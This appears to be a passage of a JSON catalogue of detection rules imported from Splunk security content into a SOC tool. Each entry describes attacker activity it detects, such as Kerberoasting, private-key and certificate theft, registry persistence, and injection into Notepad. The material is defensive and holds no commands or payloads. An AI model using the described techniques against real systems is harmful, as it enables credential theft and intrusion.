"playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-provisioning-activity-from-previously-unseen-region.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5aba1860-9617-4af9-b19d-aecac16fe4f2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_provisioning_activity_from_previously_unseen_region.yml" } }, { "id": "splunk-security-content-5adbc5f1-9a2f-41c1-a810-f37e015f8179", "type": "detection", "name": "Notepad with no Command Line Arguments", "description": "The following analytic identifies instances where Notepad.exe is launched without any command line arguments, a behavior commonly associated with the SliverC2 framework. This detection leverages process creation events from Endpoint Detection and Response (EDR) agents, focusing on processes initiated by Notepad.exe within a short time frame. This activity is significant as it may indicate an attempt to inject malicious code into Notepad.exe, a known tactic for evading detection. If confirmed malicious, this could allow an attacker to execute arbitrary code, potentially leading to system compromise and unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/notepad-with-no-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5adbc5f1-9a2f-41c1-a810-f37e015f8179", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/notepad_with_no_command_line_arguments.yml" } }, { "id": "splunk-security-content-5b2f4596-7d4c-11ec-88a7-acde48001122", "type": "detection", "name": "Windows NirSoft Utilities", "description": "The following analytic identifies the execution of commonly used NirSoft utilities on Windows systems.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution details such as process name, parent process, and command-line arguments.\nThis activity is significant for a SOC because NirSoft utilities, while legitimate, can be used by adversaries for malicious purposes like credential theft or system reconnaissance.\nIf confirmed malicious, this activity could lead to unauthorized access, data exfiltration, or further system compromise.\nNote that this search does not use a where clause to filter out known benign paths, as NirSoft utilities can be executed from various locations. This might hinder performance in environments with high data volumes.\nApply additional filtering as necessary to enhance this.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-nirsoft-utilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5b2f4596-7d4c-11ec-88a7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_nirsoft_utilities.yml" } }, { "id": "splunk-security-content-5b367cdd-8dfc-49ac-a9b7-6406cf27f33e", "type": "detection", "name": "O365 Security And Compliance Alert Triggered", "description": "The following analytic identifies alerts triggered by the Office 365 Security and Compliance Center, indicating potential threats or policy violations. It leverages data from the `o365_management_activity` dataset, focusing on events where the workload is SecurityComplianceCenter and the operation is AlertTriggered. This activity is significant as it highlights security and compliance issues within the O365 environment, which are crucial for maintaining organizational security. If confirmed malicious, these alerts could indicate attempts to breach security policies, leading to unauthorized access, data exfiltration, or other malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-security-and-compliance-alert-triggered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5b367cdd-8dfc-49ac-a9b7-6406cf27f33e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_security_and_compliance_alert_triggered.yml" } }, { "id": "splunk-security-content-5b3f63a3-865b-4637-9941-f98bd1a50c0d", "type": "detection", "name": "ASL AWS UpdateLoginProfile", "description": "The following analytic detects an AWS CloudTrail event where a user with permissions updates the login profile of another user. It leverages CloudTrail logs to identify instances where the user making the change is different from the user whose profile is being updated. This activity is significant because it can indicate privilege escalation attempts, where an attacker uses a compromised account to gain higher privileges. If confirmed malicious, this could allow the attacker to escalate their privileges, potentially leading to unauthorized access and control over sensitive resources within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-updateloginprofile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5b3f63a3-865b-4637-9941-f98bd1a50c0d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_updateloginprofile.yml" } }, { "id": "splunk-security-content-5ba382c4-2105-11ec-8d8f-acde48001122", "type": "detection", "name": "Time Provider Persistence Registry", "description": "The following analytic detects suspicious modifications to the time provider registry for persistence and autostart. It leverages data from the Endpoint.Registry data model, focusing on changes to the \"CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders\" registry path. This activity is significant because such modifications are uncommon and can indicate an attempt to establish persistence on a compromised host. If confirmed malicious, this technique allows an attacker to maintain access and execute code automatically upon system boot, potentially leading to further exploitation and control over the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/time-provider-persistence-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5ba382c4-2105-11ec-8d8f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/time_provider_persistence_registry.yml" } }, { "id": "splunk-security-content-5be109e6-1ac5-11ec-b421-acde48001122", "type": "detection", "name": "Suspicious WAV file in Appdata Folder", "description": "The following analytic detects the creation of .wav files in the AppData folder, a behavior associated with Remcos RAT malware, which stores audio recordings in this location for data exfiltration. The detection leverages endpoint process and filesystem data to identify .wav file creation within the AppData\\Roaming directory. This activity is significant as it indicates potential unauthorized data collection and exfiltration by malware. If confirmed malicious, this could lead to sensitive information being sent to an attacker's command and control server, compromising the affected system's confidentiality.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-wav-file-in-appdata-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5be109e6-1ac5-11ec-b421-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_wav_file_in_appdata_folder.yml" } }, { "id": "splunk-security-content-5c1c2877-06c0-40ee-a1a2-db71f1372b5b", "type": "detection", "name": "Windows Private Keys Discovery", "description": "The following analytic identifies processes that retrieve information related to private key files, often used by post-exploitation tools like winpeas. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that search for private key certificates. This activity is significant as it indicates potential attempts to locate insecurely stored credentials, which adversaries can exploit for privilege escalation, persistence, or remote service authentication. If confirmed malicious, this behavior could allow attackers to access sensitive information, escalate privileges, or maintain persistence within the compromised environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-private-keys-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5c1c2877-06c0-40ee-a1a2-db71f1372b5b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_private_keys_discovery.yml" } }, { "id": "splunk-security-content-5c2c02d8-bee7-4f5c-9dea-e3e1012daddb", "type": "detection", "name": "Crowdstrike Multiple LOW Severity Alerts", "description": "The following analytic detects multiple CrowdStrike LOW severity alerts, indicating a series of minor suspicious activities or policy violations. These alerts are not immediately critical but should be reviewed to prevent potential threats. They often highlight unusual behavior or low-level risks that, if left unchecked, could escalate into more significant security issues. Regular monitoring and analysis of these alerts are essential for maintaining robust security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-multiple-low-severity-alerts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5c2c02d8-bee7-4f5c-9dea-e3e1012daddb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_multiple_low_severity_alerts.yml" } }, { "id": "splunk-security-content-5c7ee6ad-baf4-44fb-b2f0-0cfeddf82dbc", "type": "detection", "name": "Windows User Execution Malicious URL Shortcut File", "description": "The following analytic detects the creation URL shortcut files, often used by malware like CHAOS ransomware. It leverages the Endpoint.Filesystem datamodel to identify \".url\" files created outside common directories, such as \"Program Files\". This activity can be significant as \".URL\" files can be used as mean to trick the user into visiting certain websites unknowingly, or when placed in certain locations such as \"\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\\", it may allow the execution of malicious code upon system reboot. If confirmed malicious, this could allow an attacker to achieve persistence and execute harmful payloads, potentially leading to further system compromise and data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-user-execution-malicious-url-shortcut-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5c7ee6ad-baf4-44fb-b2f0-0cfeddf82dbc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_user_execution_malicious_url_shortcut_file.yml" } }, { "id": "splunk-security-content-5ca7ebee-4ee7-4cf2-b3be-0ea26a00d822", "type": "detection", "name": "Microsoft Intune Manual Device Management", "description": "Microsoft Intune device management configuration policies, scripts & apps are a all tools administrators can use to remotely manage intune managed devices. Instead of waiting for the devices to poll for changes to polciies, the policies can be manually pushed to expidite delivery. This may be useful in a pinch, it may also be a sign of an impatient attacker trying to speed up the delivery of their payload. This detection identifies when a device management configuration policy sync events, on-demand remediation scripts are triggered or when devices are remotely restarted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.007", "T1072", "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/microsoft-intune-manual-device-management.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5ca7ebee-4ee7-4cf2-b3be-0ea26a00d822", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/microsoft_intune_manual_device_management.yml" } }, { "id": "splunk-security-content-5cc67381-44fa-4111-8a37-7a230943f027", "type": "detection", "name": "Kerberoasting spn request with RC4 encryption", "description": "The following analytic detects potential Kerberoasting attacks by identifying Kerberos service ticket requests with RC4 encryption through Event ID 4769. It leverages specific Ticket_Options values commonly used by Kerberoasting tools. This activity is significant as Kerberoasting allows attackers to request service tickets for domain accounts, typically service accounts, and crack them offline to gain privileged access. If confirmed malicious, this could lead to unauthorized access, privilege escalation, and further compromise of the Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kerberoasting-spn-request-with-rc4-encryption.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5cc67381-44fa-4111-8a37-7a230943f027", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/kerberoasting_spn_request_with_rc4_encryption.yml" } }, { "id": "splunk-security-content-5ced34b4-ab32-4bb0-8f22-3b8f186f0a38", "type": "detection", "name": "Potential password in username", "description": "The following analytic identifies instances where users may have mistakenly entered their passwords in the username field during authentication attempts. It detects this by analyzing failed authentication events with usernames longer than 7 characters and high Shannon entropy, followed by a successful authentication from the same source to the same destination. This activity is significant as it can indicate potential security risks, such as password exposure. If confirmed malicious, attackers could exploit this to gain unauthorized access, leading to potential data breaches or further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.003", "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/potential-password-in-username.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5ced34b4-ab32-4bb0-8f22-3b8f186f0a38", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/potential_password_in_username.yml" } }, { "id": "splunk-security-content-5d4d2cd2-7b65-4474-97cf-e9b203bcd770", "type": "detection", "name": "ESXi Malicious VIB Forced Install", "description": "Detects potentially malicious installation of VMware Installation Bundles (VIBs) using the --force flag. The --force option bypasses signature and compatibility checks, allowing unsigned, community-supported, or incompatible VIBs to be installed on an ESXi host. This behavior is uncommon in normal administrative operations and is often observed in post-compromise scenarios where adversaries attempt to install backdoored or unauthorized kernel modules, drivers, or monitoring tools to establish persistence or gain deeper control of the hypervisor.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-malicious-vib-forced-install.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5d4d2cd2-7b65-4474-97cf-e9b203bcd770", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_malicious_vib_forced_install.yml" } }, { "id": "splunk-security-content-5d814af1-1041-47b5-a9ac-d754e82e9a26", "type": "detection", "name": "Process Creating LNK file in Suspicious Location", "description": "The following analytic detects a process creating a `.lnk` file in suspicious locations such as `C:\\User*` or `*\\Local\\Temp\\*`.\nIt leverages filesystem and process activity data from the Endpoint data model to identify this behavior.\nThis activity can be significant because creating `.lnk` files in these directories is a common indicator of spear phishing tools to establish persistence or execute malicious payloads.\nIf confirmed malicious, this could allow an attacker to maintain persistence, execute arbitrary code, or further compromise the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/process-creating-lnk-file-in-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5d814af1-1041-47b5-a9ac-d754e82e9a26", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/process_creating_lnk_file_in_suspicious_location.yml" } }, { "id": "splunk-security-content-5d8bb1f0-f65a-4b4e-af2e-fcdb88276314", "type": "detection", "name": "Azure AD Multiple AppIDs and UserAgents Authentication Spike", "description": "The following analytic detects unusual authentication activity in Azure AD, specifically when a single user account has over 8 authentication attempts using 3+ unique application IDs and 5+ unique user agents within a short period. It leverages Azure AD audit logs, focusing on authentication events and using statistical thresholds. This behavior is significant as it may indicate an adversary probing for MFA requirements. If confirmed malicious, it suggests a compromised account, potentially leading to further exploitation, lateral movement, and data exfiltration. Early detection is crucial to prevent substantial harm.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-multiple-appids-and-useragents-authentication-spike.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5d8bb1f0-f65a-4b4e-af2e-fcdb88276314", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_multiple_appids_and_useragents_authentication_spike.yml" } }, { "id": "splunk-security-content-5d93894e-befa-4429-abde-7fc541020b7b", "type": "detection", "name": "Windows Multiple Accounts Disabled", "description": "The following analytic identifies instances where more than five unique Windows accounts are disabled within a 10-minute window, as indicated by Event Code 4725 in the Windows Security Event Log. It leverages the wineventlog_security dataset, grouping data into 10-minute segments and tracking the count and distinct count of TargetUserName. This behavior is significant as it may indicate internal policy breaches or an external attacker's attempt to disrupt operations. If confirmed malicious, this activity could lead to widespread account lockouts, hindering user access and potentially disrupting business operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-accounts-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5d93894e-befa-4429-abde-7fc541020b7b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_accounts_disabled.yml" } }, { "id": "splunk-security-content-5d9c6eee-988c-11eb-8253-acde48001122", "type": "detection", "name": "WinEvent Scheduled Task Created Within Public Path", "description": "The following analytic detects the creation of scheduled tasks within user-writable paths using Windows Security EventCode 4698. It identifies tasks registered via schtasks.exe or TaskService that execute commands from directories like Public, ProgramData, Temp, and AppData. This behavior is significant as it may indicate an attempt to establish persistence or execute unauthorized commands. If confirmed malicious, an attacker could maintain long-term access, escalate privileges, or execute arbitrary code, posing a severe threat to system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/winevent-scheduled-task-created-within-public-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5d9c6eee-988c-11eb-8253-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/winevent_scheduled_task_created_within_public_path.yml" } }, { "id": "splunk-security-content-5db16825-81bd-4923-a8d6-d6a13a59832a", "type": "detection", "name": "Linux Auditd System Network Configuration Discovery", "description": "The following analytic detects suspicious system network configuration discovery activities, which may indicate an adversary's attempt to gather information about the network environment. Such actions typically involve commands or tools used to identify network interfaces, routing tables, and active connections. Detecting these activities is crucial, as they often precede more targeted attacks like lateral movement or data exfiltration. By identifying unusual or unauthorized network discovery efforts, this analytic helps security teams to swiftly detect and respond to potential reconnaissance operations, mitigating the risk of further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-system-network-configuration-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5db16825-81bd-4923-a8d6-d6a13a59832a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_system_network_configuration_discovery.yml" } }, { "id": "splunk-security-content-5df35d50-e1a3-4a52-a337-92e69d9b1b8a", "type": "detection", "name": "Windows PowerShell Process With Malicious String", "description": "The following analytic detects the execution of multiple offensive toolkits and commands through the process execution datamodel. This method captures commands given directly to powershell.exe, allowing for the identification of suspicious activities including several well-known tools used for credential theft, lateral movement, and persistence. If confirmed malicious, this could lead to unauthorized access, privilege escalation, and potential compromise of sensitive information within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-process-with-malicious-string.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5df35d50-e1a3-4a52-a337-92e69d9b1b8a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_process_with_malicious_string.yml" } }, { "id": "splunk-security-content-5dfaa3d3-e2e4-4053-8252-16d9ee528c41", "type": "detection", "name": "Azure AD Privileged Role Assigned to Service Principal", "description": "The following analytic detects the assignment of privileged roles to service principals in Azure Active Directory (AD). It leverages the AuditLogs log category from ingested Azure AD events. This activity is significant because assigning elevated permissions to non-human entities can lead to unauthorized access or malicious activities. If confirmed malicious, attackers could exploit these service principals to gain elevated access to Azure resources, potentially compromising sensitive data and critical infrastructure. Monitoring this behavior helps prevent privilege escalation and ensures the security of Azure environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-privileged-role-assigned-to-service-principal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5dfaa3d3-e2e4-4053-8252-16d9ee528c41", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_privileged_role_assigned_to_service_principal.yml" } }, { "id": "splunk-security-content-5e06e262-d7cd-4216-b2f8-27b437e18458", "type": "detection", "name": "Detect Outbound LDAP Traffic", "description": "The following analytic identifies outbound LDAP traffic to external IP addresses. It leverages the Network_Traffic data model to detect connections on ports 389 or 636 that are not directed to private IP ranges (RFC1918). This activity is significant because outbound LDAP traffic can indicate potential data exfiltration or unauthorized access attempts. If confirmed malicious, attackers could exploit this to access sensitive directory information, leading to data breaches or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-outbound-ldap-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5e06e262-d7cd-4216-b2f8-27b437e18458", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_outbound_ldap_traffic.yml" } }, { "id": "splunk-security-content-5e0b1936-8f99-4399-8ee2-9edc5b32e170", "type": "detection", "name": "Windows Screen Capture Via Powershell", "description": "The following analytic detects the execution of a PowerShell script designed to capture screen images on a host. It leverages PowerShell Script Block Logging to identify specific script block text patterns associated with screen capture activities. This behavior is significant as it may indicate an attempt to exfiltrate sensitive information by capturing desktop screenshots. If confirmed malicious, this activity could allow an attacker to gather visual data from the compromised system, potentially leading to data breaches or further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-screen-capture-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5e0b1936-8f99-4399-8ee2-9edc5b32e170", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_screen_capture_via_powershell.yml" } }, { "id": "splunk-security-content-5e38bd3e-5da7-483d-aa61-27f7e8c27ad1", "type": "detection", "name": "Windows WMI Reconnaissance Class Query", "description": "The following analytic detects the use of WMIC (Windows Management Instrumentation Command-line) for reconnaissance and system information discovery on Windows endpoints.\nIt identifies command-line queries targeting common Win32 WMI classes such as Win32_OperatingSystem, Win32_Processor, csproduct, Win32_DiskDrive, and Win32_PhysicalMemory, which are frequently leveraged to enumerate hardware, operating system details, and system configuration. Adversaries often use these queries during post-exploitation to fingerprint hosts, assess virtualization, and tailor follow-on activity. While WMIC usage can be legitimate for administrative and inventory tasks, suspicious or unexpected execution\u2014particularly by non-administrative users or uncommon parent processes\u2014may indicate malicious reconnaissance aligned with system discovery techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmi-reconnaissance-class-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5e38bd3e-5da7-483d-aa61-27f7e8c27ad1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmi_reconnaissance_class_query.yml" } }, { "id": "splunk-security-content-5e38ded4-c964-41f4-8cb6-4a1a53c6929f", "type": "detection", "name": "Windows PowerShell Export Certificate", "description": "The following analytic detects the use of the PowerShell Cmdlet `export-certificate` by leveraging Script Block Logging. This activity is significant as it may indicate an adversary attempting to exfiltrate certificates from the local Certificate Store on a Windows endpoint. Monitoring this behavior is crucial because stolen certificates can be used to impersonate users, decrypt sensitive data, or facilitate further attacks. If confirmed malicious, this activity could lead to unauthorized access to encrypted communications and sensitive information, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.004", "T1649" ], 